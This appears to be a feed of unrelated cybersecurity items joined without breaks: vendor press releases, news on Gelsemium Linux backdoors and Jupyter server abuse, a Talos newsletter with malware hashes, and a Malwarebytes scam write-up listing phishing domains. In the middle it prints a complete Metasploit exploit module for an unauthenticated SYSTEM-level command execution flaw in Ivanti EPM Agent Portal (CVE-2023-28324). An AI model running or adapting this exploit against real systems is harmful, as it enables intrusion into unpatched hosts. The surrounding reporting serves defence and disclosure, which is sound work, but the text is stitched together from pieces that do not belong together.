PRESS RELEASE

TEMPE, Ariz. and PRAGUE, Nov. 21, 2024 /PRNewswire/ -- Norton, a leading Cyber Safety brand of Gen™ (NASDAQ: GEN), has launched the new Norton Small Business Premium, an all-in-one, easy-to-use cybersecurity plan specifically designed for entrepreneurs and small businesses. In addition to powerful device security, Norton Small Business Premium features 24/7 Business Tech Support, Financial Monitoring, Social Media Monitoring and more.

"More than half (56%)\* of small business owners report that cybersecurity threats impact their business. Unfortunately, not enough of these entrepreneurs and small businesses have cybersecurity in place, often due to their cost and complexity," said Leena Elias, Chief Product Officer at Gen. "Norton Small Business Premium not only takes the work out of securing your business, we also help when other IT issues crop up."

Cybersecurity is crucial for businesses to protect their sensitive data, networks, and digital assets from cyberthreats that can lead to unauthorized access to company networks, data breaches, financial losses, and reputation damage. To help protect businesses where they need it most, Norton Small Business Premium includes features such as:

*   24/7 Business Tech Support: Subscriptions include access to Norton experts five time as year. These experts are available 24/7 for remote IT support on your devices, network, and software.
    
*   Financial Monitoring: Get alerts so you can act quickly if we detect suspicious transactions on your company's bank accounts.   
    
*   Social Media Monitoring: Prevent your business social media profiles from being taken over by regularly monitoring for suspicious activities on your accounts. 
    
*   Device Security: Real-time antivirus helps protect your devices, and our firewall\* helps block cybercriminals from accessing your network.
    
*   Secure VPN: Work online and access websites more safely at home or on the go with bank-grade VPN encryption.
    
*   Additional features include Password Manager, Cloud Backup, performance enhancements and more.
    

Norton Small Business Premium doesn't require an IT specialist or cybersecurity knowledge to use. It's easy to install and runs seamlessly in the background on Windows, Mac, Android, and iOS, allowing you to focus on your business without slowing down operations. 

Norton recommends 10 tips for small business Cyber Safety: 

1.  Learn to spot signs of phishing and teach your employees
    
2.  Only click links or download attachments from known sources
    
3.  Avoid sharing personal information or private company data over email
    
4.  Always keep your operating system, applications, and drivers up-to-date
    
5.  Make sure your WiFi network is protected with a strong password
    
6.  Regularly back up your data
    
7.  Require employees to use a VPN when doing company work on a public WiFi network (think airports and coffee shops)
    
8.  Always use multi-factor-authentication for an extra layer of protection
    
9.  Don't neglect mobile devices – make sure they are password protected and use security software
    
10.  Invest in a cybersecurity solution such as Norton Small Business Premium
    

Norton Small Business Premium is available now with prices starting at $299.99/year with options for 6, 10 or 20-device plans. For more information, please visit norton.com/products/small-business.

About Norton   
Norton is a leading Cyber Safety brand of Gen™ (NASDAQ: GEN), a global company dedicated to powering Digital Freedom through its family of trusted consumer brands including Norton, Avast, LifeLock, Avira, AVG, ReputationDefender and CCleaner. Gen empowers people to live their digital lives safely, privately, and confidently today and for generations to come. Gen brings award-winning products and services in cybersecurity, online privacy and identity protection to more than 500 million users in more than 150 countries. Learn more at Norton.com and GenDigital.com.

You May Also Like

Norton Introduces Small Business Premium for Business-Grade Security

In a sign of the times, a backdoor malware whose ancestors date back to 2005 has morphed to target Linux systems.

Source: Imagebroker via Alamy Stock Photo

Two well-documented Chinese backdoors have recently been modified to operate on Linux systems.

The advanced persistent threat (APT) "Gelsemium" is a decade old now, and the new malware tied to the group, Wolfsbane and Firewood, can trace their lineage back to 2005. Throughout its history, Gelsemium has focused on information gathering from Windows systems. Now, it has adjusted its tooling to operate just as effectively in Linux environments.

This, experts say, is merely the latest manifestation of a long-brewing trend.

"The Linux malware landscape is certainly accelerating," says Jason Soroko, senior fellow at Sectigo. "The increase does make sense, as organizations have heavily adopted Linux for their back office server needs, both on premises and in the cloud. Adversaries are developing cross-platform malware to maximize their reach."

**The Wolfsbane & Firewood Backdoors**

The first public sample of the first new backdoor, dubbed Wolsbane, was uploaded to VirusTotal on March 6, 2023, from Taiwan, with later uploads coming from the Philippines and Singapore (historically, Gelsemium has targeted entities in the Middle East and East Asia).

Contextual evidence suggests that the malware's authors have been exploiting vulnerabilities in Java Web applications to access public-facing Apache Tomcat servers. And a deeper look inside reveals unmistakable overlaps with Gelsevirine, a Windows backdoor known to be used by Gelsemium. In essence, the Wolfsbane malware was a Linux port of Gelsevirine, featuring a modified Beurk Experimental Unix RootKit to hide its various malicious activities.

Alongside Wolfsbane, though not definitively attributable to Gelsemium, was a second Linux-ported backdoor, Firewood. An addition to its varied and typical backdoor capabilities, it possesses a kernel-level rootkit. 

Most interestingly, Firewood appears to be the latest evolution of "Project Wood," a phylum of a backdoor that traces back generations to a program first compiled in January 2005. The latest manifestation of Project Wood before Firewood, NSPX30, was reported earlier this year.

**What Explains the Surge in Linux Cyber Threats?**

Cyber threats rise across the board every year, but the particular rise in Linux-based threats stands out. 

Since at least 2020, vendors have tracked double- and triple-digit year-over-year increases in Linux attacks. In its annual "Global Threat Report," Elastic Security has regularly found that the Linux threat landscape vastly outpaces that of macOS, more closely resembling Windows in terms of sheer volume of attacks. In 2023, for example, it found that 54% of endpoint attacks affected Linux-based devices, compared with just 39% for Windows.

Over the past 12 months, around 32% of malware infections have targeted Linux, according to Jake King, Elastic's head of threat and security intelligence. "While steadily increasing, we are seeing greater volumes of attacks and, in some cases, with greater levels of sophistication. The XZ/Liblzma backdoor discovered by researchers earlier this year shows the desire of adversaries to compromise Linux hosts, likely for a variety of reasons, growing in sophistication to supply chain compromise," he says.

The rising threats to Linux may be attributable to an increasing adoption of Linux in enterprise environments, as Soroko alluded to, or the generally improving state of Windows security — the explanation ESET went with in its blog post — or an explanation even simpler.

"One of the reasons for growing observations can always be targeted to adversarial focus changing, but it is also likely that security tooling and telemetry for Linux hosts are improving at a pace whereby attacks are identified earlier, with a greater level of context," King suggests. For example, "A growing trend for threat observations this year was Impaired Defenses for Linux, showing that adversaries are specifically looking to bypass security tools native to Linux or disable third-party security tools. This is important, as it shows we're exposing many attacks that would have previously gone undetected years ago."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Chinese APT Gelsemium Deploys 'Wolfsbane' Linux Variant

The Threat Source Newsletter is back! William Largent discusses bidirectional communication in the SOC, and highlights new Talos research including the discovery of PXA Stealers.

Thursday, November 21, 2024 14:02

Welcome to this week’s edition of the Threat Source newsletter. 

Bidirectional communication is foundational to a well-built team regardless of environment. It’s critical in information security to be able to drive a conversation up the ladder and down and not lose the critical elements. One of the most difficult challenges that cyber security teams face is making sure that everyone that is in a decision-making space is aware of the highly technical challenges that the evolving threat landscape dictates. Navigating the challenges that come in continually evolving the team and it’s tools to defend is often a much greater challenge. I’m going to help you with those conversations. In both directions. By talking about drumming. I know, I don’t have the pro wrestling takes that Jon came to the table with, so you’re going to have to run with me Constant Reader.  

I’m going to choose drumming to outline an easy way to identify some complex issues and talk about them in both directions and drumming is a little easier to identify for non-musicians and FAR less contentious than a spicy guitar opinion. Ok, so let’s start with a simple concept.  

 Sounds difficult. Is difficult.    
Sounds difficult. Is easy.   
Sounds easy. Is difficult.     
Sounds easy. Is easy.  

 Sounds difficult. Is difficult. This one is easy – Tomas Haake from Meshuggah playing Bleed is a perfect example. Polyrhythms, stamina, speed, interdependence, and complexity. This sounds difficult. It is difficult. Only the criminally insane attempt to learn how to play this song.  

Sounds easy. Is easy. Take Phil Rudd and pick any AC/DC song from Back in Black. The perfect example of sounds easy, is easy. Perfectly in the pocket.  

Sounds easy. Is difficult. This one is harder and will cause someone to wellackshully and I assure you I do not care. I’m going to give two examples, Jeff Porcaro of Toto playing Rosanna and Vinnie Colaiuta playing Seven Days with Sting. Both of these songs are immensely easy to listen to and don’t seem like there’s anything challenging going on. Until you try to play along, then you cry and examine all the choices you’ve made in life.  

Sounds difficult. Is easy. This is going to be a sticky situation, but I’d say that you could throw on anything by Travis Barker and Dave Lombardo. Bring it haters. I’m not saying that they are bad drummers – simply that what they do sounds more difficult than it is.  

Ok William, but how does this help me at all?  

When you have information security meetings with people in your organization take a second as you look at the agenda, and your conversation in specific, and think about the groupings above and determine what kind of drumming you are hearing. Depending on your environment and team the topics will fall naturally into these categories – it can be patch and vulnerability management,  EOL devices that need to be replaced, endpoint detection and response, deciding what traffic is actionable and defining that in your SIEM, forensic analysis, threat hunting, event response, the conversations are as malleable as the threat landscape.  

It’s easy to isolate the things in your environment that are very difficult to defend AND take a skilled defender and complex tooling to defend. Those conversations flow with either junior analysts or C-Level executives. This is the “Sounds difficult. Is difficult.” type of conversation. Ditto the “Sounds easy. Is easy.” conversations are easy to have in either direction. The most difficult topics to convey fall into the “Sounds difficult. Is easy.” or “Sounds easy. Is difficult.” In my experience these conversations are usually much easier to deliver in one direction and much more difficult in the other. Jazz guys enjoy the nuance of Colaiuta and can’t wrap their minds around Lombardo while metalheads love him and don’t want to be bothered by ghost notes. By taking a moment to dissect your topic and determine where you are going to run into the “Sounds difficult. Is easy.” or the “Sounds easy. Is difficult.” situation it will allow you to prepare for those more challenging conversations so that you can craft a narrative to best capture the nuance that might be lost in a highly technical conversation with a C-Level exec, or the motivation for waiting for the next financial quarter for new tooling that the analysts really need.  

I’m not going to lie - you can prepare this way and things can still fall on deaf ears, they can still underestimate the lift required because people are fallible but if you prepare just a bit and know your audience you can drag your C-Level into a discussion on polyrhythm and pull your junior analyst up with a little Vinnie Colaiuta and make them all feel like Phil Rudd.   

**The one big thing **

Cisco Talos discovered a new information stealing campaign operated by a Vietnamese-speaking threat actor targeting government and education entities in Europe and Asia. PXA Stealer targets victims’ sensitive information, including credentials for various online accounts, VPN and FTP clients, financial information, browser cookies, and data from gaming software. PXA Stealer also has the capability to decrypt the victim’s browser master password and uses it to steal the stored credentials of various online accounts. 

**Why do I care? **

Harvested credentials can allow attackers direct access to your environment without the need to exploit vulnerabilities or face any of your defensive architecture – they can just log in. Cisco Talos Incident Response has observed an increasing number of engagements where this is the case.  

**So now what? **

Cisco Talos has released several Snort rules and ClamAV signatures to detect and defend against PXA Stealer.   

**Top security headlines of the week **

Attackers are continuing to upload hundreds of malicious packages to the open-source node package manager (NPM) repository in an attempt to infect the devices of developers that rely on these libraries. (Ars Tecnica) 

Cybersecurity and Infrastructure Security Agency (CISA) has confirmed that it's director Jen Easterly will step down from her position on President-elect Donald Trump's Inauguration Day. (Dark Reading) 

Palo Alto Networks has released a patch to fix a critical vulnerability in some instances of its firewall management interfaces. PAN observed threat activity exploiting an unauthenticated remote command execution vulnerability against firewall management interfaces. (Bleeping Computer,  Dark Reading)   

**Can’t get enough Talos? **

*   Unwrapping the emerging Interlock ransomware attack 
*   Talos Takes on Interlock 
*   November Patch Tuesday release contains three critical remote code execution vulnerabilities 
*   It's Taplunk! Talos and Splunk threat researchers meet to put the security world to rights 

**Upcoming events where you can find Talos **

 CyberCon Romania

(Nov 21-22)    
Bucharest, Romania 

 Martin Lee from Cisco Talos will speak on a panel discussion Maintaining Resilience for a Secure Cyber Infrastructure.  

misecCON (Nov. 22)    
Lansing, Michigan 

Terryn Valikodath from Cisco Talos Incident Response will explore the core of DFIR, where digital forensics becomes detective work and incident response turns into firefighting. 

AVAR

(Dec 4-6)    
Chennai, India 

 Vanja Svancer and Chetan Raghuprasad from Cisco Talos will both present, Vanja will be discussing Exploring Vulnerable Windows Drivers, while Chetan presents Sweet and Spicy Recipes for Government Agencies by SneakyChef.  

**Most prevalent malware files from Talos telemetry over the past week  **

SHA 256: c20fbc33680d745ec5ff7022c282a6fe969c6e6c7d77b7cfac34e6c19367cf9a  

MD5: 3bc6d86fc4b3262137d8d33713ed6082  

Typical Filename: 8c556f0a.dll  

Claimed Product: N/A  

Detection Name: Gen:Variant.Lazy.605353  

 SHA 256: bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a 

MD5: 200206279107f4a2bb1832e3fcd7d64c 

Typical Filename: lsgkozfm.bat 

Claimed Product: N/A 

Detection Name: Win.Dropper.Scar::tpd   

SHA 256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca  

MD5: 71fea034b422e4a17ebb06022532fdde  

Typical Filename: VID001.exe  

Claimed Product: N/A  

Detection Name: RF.Talos.80  

SHA 256: 3a2ea65faefdc64d83dd4c06ef617d6ac683f781c093008c8996277732d9bd66  

MD5: 8b84d61bf3ffec822e2daf4a3665308c  

Typical Filename: RemComSvc.exe  

Claimed Product: N/A  

Detection Name: W32.3A2EA65FAE-95.SBX.TG

Bidirectional communication via polyrhythms and shuffles: Without Jon the beat must go on

This Metasploit module leverages an unauthenticated remote command execution vulnerability in Ivanti's EPM Agent Portal where an RPC client can invoke a method which will run an attacker-specified string on the remote target as NT AUTHORITY\SYSTEM. This vulnerability is present in versions prior to EPM 2021.1 Su4 and EPM 2022 Su2.

    # This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-frameworkrequire 'rex/proto/ms_nrtp/client'class MetasploitModule < Msf::Exploit::Remote  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::Tcp  Rank = ExcellentRanking  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Ivanti EPM Agent Portal Command Execution',        'Description' => %q{          This module leverages an unauthenticated RCE in Ivanti's EPM Agent Portal where a RPC client can invoke a method          which will run an attacker-specified string on the remote target as NT AUTHORITY\SYSTEM.          This vulnerability is present in versions prior to EPM 2021.1 Su4 and EPM 2022 Su2.        },        'Author' => [          'James Horseman', # original poc          'Zach Hanley', # original poc          'Spencer McIntyre' # metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          ['CVE', '2023-28324'],          ['URL', 'https://forums.ivanti.com/s/article/SA-2023-06-06-CVE-2023-28324?language=en_US'],          ['URL', 'https://github.com/horizon3ai/CVE-2023-28324'],        ],        'Platform' => 'win',        'Arch' => ARCH_CMD,        'Targets' => [          [ 'Automatic', {} ],        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-06-07', # Ivanti article created date        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_options([      Opt::RPORT(nil, true, 'The target port is not static. For more info, see this module\'s Verifications Steps in the docs.'),    ])    deregister_options('SSL')  end  def check    cwd = execute_command('echo %cd%', 0)    return CheckCode::Safe('Command execution failed.') unless cwd.to_s =~ /.:\\Windows\\System32/i    CheckCode::Vulnerable("Command execution test succeeded. Current working directory: #{cwd}")  rescue Rex::SocketError => e    CheckCode::Safe("MS-NRTP connection failed. #{e.class}: #{e.message}")  end  def exploit    execute_command(payload.raw)  end  def execute_command(command, result_delay = -1)    if @nrtp_client.nil?      @nrtp_client = client = IAgentPortal.new(        datastore['RHOST'],        datastore['RPORT'],        'LANDeskAgentPortal/LDSM',        context: { 'Msf' => framework, 'MsfExploit' => self }      )      client.connect      vprint_status('Connected to the remote end point')    else      client = @nrtp_client    end    client.do_request(command)    return nil unless result_delay >= 0    sleep result_delay    client.do_get_result  endendclass IAgentPortal < Rex::Proto::MsNrtp::Client  def recv_binary    Msf::Util::DotNetDeserialization::Types::SerializedStream.read(recv)  end  def send_recv_binary(serialized_stream)    send_binary(serialized_stream)    recv_binary  end  def do_request(shell_command)    ss_response = send_recv_binary(ss_request(shell_command))    method_return = ss_response.records.find { |record| record.record_type == Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MethodReturn] }    method_return.record_value.return_value.val.value  end  def do_get_result    ss_response = send_recv_binary(ss_get_result)    ass = ss_response.records.find { |record| record.record_type == Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ArraySingleString] }    return nil unless ass    ass.record_value.members.first.record_value.string.value  end  private  def ss_get_result    Msf::Util::DotNetDeserialization::Types::SerializedStream.new({      records: [        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:SerializedStreamHeader], record_value: { major_version: 1 } },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MethodCall],          record_value: {            message_enum: {              no_context: 1,              args_inline: 1            },            method_name: 'GetResult',            type_name: 'LANDesk.AgentPortal.IAgentPortal, AgentPortal, Version=11.0.0.0, Culture=neutral, PublicKeyToken=da26723fc8ab14fb',            args: [{ primitive_type_enum: Msf::Util::DotNetDeserialization::Enums::PrimitiveTypeEnum[:String], val: 'localhost' }]          }        },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MessageEnd] }      ]    })  end  def ss_request(shell_command)    Msf::Util::DotNetDeserialization::Types::SerializedStream.new({      records: [        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:SerializedStreamHeader], record_value: { root_id: 1, header_id: -1, major_version: 1, minor_version: 0 } },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MethodCall],          record_value: {            message_enum: {              method_signature_in_array: 1,              no_context: 1,              args_in_array: 1            },            method_name: 'Request',            type_name: 'LANDesk.AgentPortal.IAgentPortal, AgentPortal, Version=11.0.0.0, Culture=neutral, PublicKeyToken=da26723fc8ab14fb'          }        },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ArraySingleObject], record_value: { array_info: { obj_id: 1, member_count: 2 } } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 2 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 3 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ArraySingleObject], record_value: { array_info: { obj_id: 2, member_count: 4 } } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 4, string: 'localhost' } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 5 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 6, string: 'cmd.exe' } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 7, string: "/c #{shell_command}" } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryArray], record_value: { obj_id: 3, binary_array_type_enum: 0, rank: 1, lengths: [4], type_enum: 3, additional_type_info: 'System.Type' } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 8 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 9 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 8 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MemberReference], record_value: { id_ref: 8 } },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryLibrary], record_value: { library_id: 11, library_name: 'APCommon, Version=11.0.0.0, Culture=neutral, PublicKeyToken=da26723fc8ab14fb' } },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ClassWithMembersAndTypes],          record_value: {            class_info: { obj_id: 5, name: 'LANDesk.AgentPortal.IAgentPortalBase+ActionEnum', member_count: 1, member_names: ['value__'] },            member_type_info: { binary_type_enums: [0], additional_infos: [8] },            library_id: 11,            member_values: [1]          }        },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:SystemClassWithMembersAndTypes],          record_value: {            class_info: { obj_id: 8, name: 'System.UnitySerializationHolder', member_count: 3, member_names: ['Data', 'UnityType', 'AssemblyName'] },            member_type_info: { binary_type_enums: [1, 0, 1], additional_infos: [8] },            member_values: [{ record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 12, string: 'System.String' } }, 4, { record_type: 6, record_value: { obj_id: 13, string: 'mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' } }]          }        },        {          record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:ClassWithId],          record_value: {            obj_id: 9,            metadata_id: 8,            member_values: [              { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 14, string: 'LANDesk.AgentPortal.IAgentPortalBase+ActionEnum' } },              4,              { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:BinaryObjectString], record_value: { obj_id: 15, string: 'APCommon, Version=11.0.0.0, Culture=neutral, PublicKeyToken=da26723fc8ab14fb' } }            ]          }        },        { record_type: Msf::Util::DotNetDeserialization::Enums::RecordTypeEnum[:MessageEnd], record_value: {} }      ]    })  endend

Ivanti EPM Agent Portal Command Execution

Aqua Nautilus’ research reveals hackers are leveraging vulnerable and misconfigured Jupyter Notebook servers to steal live sports streams.…

Aqua Nautilus’ research reveals hackers are leveraging vulnerable and misconfigured Jupyter Notebook servers to steal live sports streams. Learn about the techniques used, the risks involved, and how to protect your organization from similar attacks.

Cybersecurity researchers at Aqua Nautilus uncovered a novel attack technique where threat actors exploited misconfigured JupyterLab and Jupyter Notebook servers to illegally stream sports events, drop live streaming capture tools, and duplicate broadcasts on their illegal server, causing stream ripping.

Unfortunately, illegal live streaming of sports events is a growing issue, impacting broadcasters, leagues, and legitimate platforms. With readily available streaming tools and high-speed internet, unauthorized broadcasts are flourishing, causing financial losses for both major leagues and smaller teams dependent on viewership revenue.

The targeted source streamed the UEFA Champions League match between Shakhtar Donetsk and BSC Young Boys on November 6, 2024 (Screenshot: Aqua Nautilus)

“The problem is widespread, with 5.1 million adults in England, Scotland, and Wales admitting to watching an illegal stream during the first six of last year,” researchers noted in the blog post. 

In this instance, the red flag was the seemingly harmless tool, ffmpeg. This open-source software is widely used for video processing and streaming. While threat intelligence confirmed its legitimacy, closer inspection revealed a twist. The attackers exploited misconfigured JupyterLab and Jupyter Notebook environments to gain access and deploy ffmpeg for live stream ripping.

The attack started with exploiting unauthenticated access to JupyterLab or Jupyter Notebook, which allowed remote code execution. The attackers then updated the server and downloaded ffmpeg, which was repurposed to capture live sports streams and redirect them to a malicious server. 

This reveals that the MITRE ATT&CK framework was used in an attack, where adversaries gained access through misconfigured Jupyter Notebook and JupyterLab environments. Attackers installed and ran ffmpeg, exfiltrated video content, and used the victim’s bandwidth to transfer the stolen streaming data.

This exploitation can result in “denial of service, data manipulation, data theft, corruption of AI and ML processes, lateral movement to more critical environments and, in the worst-case scenario, substantial financial and reputational damage,” researchers explained.

Attack flow (Screenshot: Aqua Nautilus)

Though seemingly minor in its immediate impact on organizations, the attack indicates the importance of behavioural analysis. Traditional security solutions might overlook such activity. However, the unusual deployment and execution of ffmpeg for live-stream capture alerted Aqua Nautilus’ security team. By analyzing network traffic, files, and memory dumps, Aqua Nautilus was able to reconstruct the entire attack sequence.

Undoubtedly, JupyterLab and Jupyter Notebook are valuable assets for data scientists, but security shortcomings can leave them vulnerable. Often, these servers are managed by individuals without a strong security background.

Leaving them connected to the internet with open access or weak firewalls allows threat actors to exploit them for attack. Token mishandling is another concern, as exposed tokens can grant full access. Thankfully, implementing best practices like restricted IPs, strong authentication, HTTPS, and proper token management can greatly lower these risks.

1.  New Jupyter infostealer delivered through the MSI installer
2.  Qubitstrike Malware Hits Jupyter Notebooks for Cloud Data
3.  New Jupyter backdoor malware steals Chrome, Firefox data
4.  NTLM Credential Theft in Python Apps Risk Windows Security
5.  PythonAnywhere Cloud Platform Abused to Host Ransomware

Hackers Exploit Misconfigured Jupyter Servers for Illegal Sports Streaming

Dubai, United Arab Emirates, 20th November 2024, CyberNewsWire

**Dubai, United Arab Emirates, November 20th, 2024, CyberNewsWire**

ANY.RUN announced the launch of Smart Content Analysis, an advanced mechanism within its Automated Interactivity feature that enables the service to automatically detonate complex malware and phishing attacks, helping users speed up their investigations and gain in-depth insights into malicious behavior. 

**About Smart Content Analysis** 

Smart Content Analysis is a mechanism that allows the ANY.RUN sandbox to execute multi-stage cyber attacks without any user involvement. It does this by following three main steps: 

*   Scanning uploaded files to locate critical components, such as URLs and email attachments. 
*   Identifying the key components detonation of which moves the attack forward, including URLs embedded within QR codes or rewritten by security filters. 
*   Engaging with the malicious content in a controlled environment, for instance, by opening URLs in a browser or running payloads found in email archive attachments to observe their behavior. 

Automated Interactivity toggle inside ANY.RUN sandbox 

**Detonating a Multi-Stage Attack with Automated Interactivity** 

With this new upgrade, ANY.RUN’s sandbox can automatically execute the following types of content found at different stages of complex cyber attacks: 

*   URLs inside QR codes 
*   Modified links 
*   Multi-stage redirects 
*   Email attachments 
*   Payloads with archives 

**Users interested can get a 14-day free trial of ANY.RUN to explore Automated Interactivity and other PRO features**  

Consider the following multi-stage phishing attack analyzed with Automated Interactivity.  

The phishing email analyzed with Automated Interactivity 

The system automatically opens the .eml file submitted by the user via Outlook, detects a PDF attachment, and scans its contents. 

The static analysis module in ANY.RUN sandbox reveals the link hidden in the QR 

Inside the PDF, it identifies a QR code, instantly extracts the embedded URL, and opens it in a browser.   

ANY.RUN sandbox automatically solving CAPTCHA challenges 

When faced with a CAPTCHA challenge, commonly used to evade detection, the feature successfully solves it and moves on to the next stage of the attack. 

The final phishing page designed to steal victims’ credentials 

Eventually, it successfully reaches the final phishing page, not only ensuring complete detection of the attack, but also providing additional context on the threat at hand. 

**Adaptive to New Threats** 

ANY.RUN’s Smart Content Analysis is built to adapt to the changing threat landscape. With regular attack scenario updates from the ANY.RUN threat research team, the system remains aligned with emerging attack methods, allowing it to handle even the latest and most evasive threats. 

**Exploring Smart Content Analysis** 

Automated Interactivity helps security professionals streamline and improve their threat investigations: 

*   **Less manual effort**: No more wasted clicks. Let the sandbox handle repetitive actions so you can focus on the bigger picture.  
*   **Faster, deeper insights**: Go beyond surface detections with simulations that bring hidden threat layers to light.  
*   **Speedy analysis**: Accelerate your analysis with automation that moves as fast as you do, from simple phishing links to layered attack chains. 

Users can request a 14-day free trial of ANY.RUN’s Interactive Sandbox to try Automated Interactivity for free.

𝐀𝐛𝐨𝐮𝐭 𝐀𝐍𝐘.𝐑𝐔𝐍

ANY.RUN serves over 500,000 cybersecurity professionals globally, offering an interactive platform for malware analysis targeting Windows and Linux environments. With advanced threat intelligence tools such as TI Lookup, YARA Search, and Feeds, ANY.RUN enhances incident response and provides analysts with essential data to counter cyber threats effectively.

Users can connect through social media: X, LinkedIn

**Contact**

**ANYRUN FZCO**  
**\[email protected\]**  
**+1 657-366-5050**

ANY.RUN Sandbox Now Automates Interactive Analysis of Complex Cyber Attack Chains

People are receiving disturbing emails that appear to imply something has happened to their friend or family member.

Tech support scammers are again stooping low with their email campaigns. This particular one hints that one of your contacts may have met an untimely end.

It all starts with an email titled “Sad announcement” followed by a full name of someone you know. The email may appear to come from the person themselves.

A co-worker who received such an email pointed it out to our team. Looking around, I found the first report about such an email in a tweet dating back to February 5, 2024.

With some more information about what I was looking for, I managed to find several more.

There is a great deal of variation between the emails, but we do have enough samples to show you a pattern which looks like this:

Subject: Sad announcement: <First name><Last name>

Sometimes the colon is replaced by the word “from”.

Then a short sentence to pique the reader’s curiosity, which often references photos. Here are some examples:

> “When you open them you will see why I actually wanted to share them with you today”
> 
> “Never thought I would want to share these images with you, anyways here they are”
> 
> “I’m presuming you should remember these two ladies, in that photo”
> 
> “When I was looking through some old folders I found these 3 pics”
> 
> “it wasn’t initially my plan, but I had to change my mind about it”
> 
> “Two pictures that I wanted to share with you. They’re likely to bring a flood of memories to you, as they did to me…”
> 
> “Probably should have contacted you a little bit earlier. Anyways just wanted to keep you updated”

This is then immediately followed by a link. These also follow a certain pattern:

gjsqr.hytsiysx.com

tmdlod.vdicedohf.com

gtfhq.rmldxkff.com

pdbh.ramahteen.com

owwiu.dexfyerd.com

roix.unrgagceso.com

yrlbi.vohdsniuz.com

uqjk.mbafwnds.com

vjdbd.hhesdeh.com

mbjzo.enexoo.com

These domains are all registered with NameCheap and are only active for a few days.

To close the emails off, the scammers end with a quote in the format:

> “You do not find the happy life. You make it.” –  Camilla Eyring Kimball

The sender addresses are spoofed to look like they were coming from family or friends of the target. The actual sender addresses are compromised accounts from all over the world.

The campaign looks to have targeted mainly the US, but I also found some located in Ireland and the UK and some odd ones in India and Italy.

So, the question is, what are they after? The short-lived domains really made it hard for me to figure that out. It took me quite a bit to find a domain that was still active, but then I knew soon enough what the end-goal of the spammers was.

A short chain of redirects sent me to https://niceandsafetystore0990.blob.core.windows[.]net/niceandsafetystore0990/index.html which is now blocked by Malwarebytes Browser Guard.

The blob.core.windows.net subdomains are unique identifiers for Azure Blob Storage accounts. They follow this format:

<storageaccountname>.blob.core.windows.net

Where <storageaccountname> is the name of the specific Azure Storage account. Spammers like using them because the windows.net part of the domain makes them look trustworthy.

The website itself probably looks familiar to a lot of readers: A fake online Windows Defender scan.

The fake Windows Defender site shows that your system is infected with loads of threats.

Funny enough the site claims to be Windows Defender, but uses Malwarebytes’ detection names. For example: Microsoft does not detect the Potentially Unwanted Program which Malwarebytes detects as PUP.Optional.RelevantKnowledge.

Anyway, the website quickly takes up the entire screen, so you have to click or hold (depending on your browser) the ESC button to get back the controls that allow you to close the website.

Now that you have seen the patterns in the email, we hope that you will refrain from clicking the links. The redirect chain can be changed and may be different for your location and type of system. So, there may be more serious consequences than an annoying website.

**How to avoid the “sad announcement” scam**

*   Always compare the actual sender address with the email address this person would normally use to send you an email.
*   Never click on link in an unsolicited email before checking with the sender.
*   Don’t call the phone numbers displayed on the website, because they will try to defraud you.
*   If in doubt, contact your friend via another, trusted method

If your browser or mobile device “locks up”, meaning you’re no longer able to navigate away from a virus warning, you’re likely looking at a tech support scam. If something claims to show the files and folders from inside of your browser, this is another signal that you’re on a fake page. Close the browser if possible or restart your device if this doesn’t work.

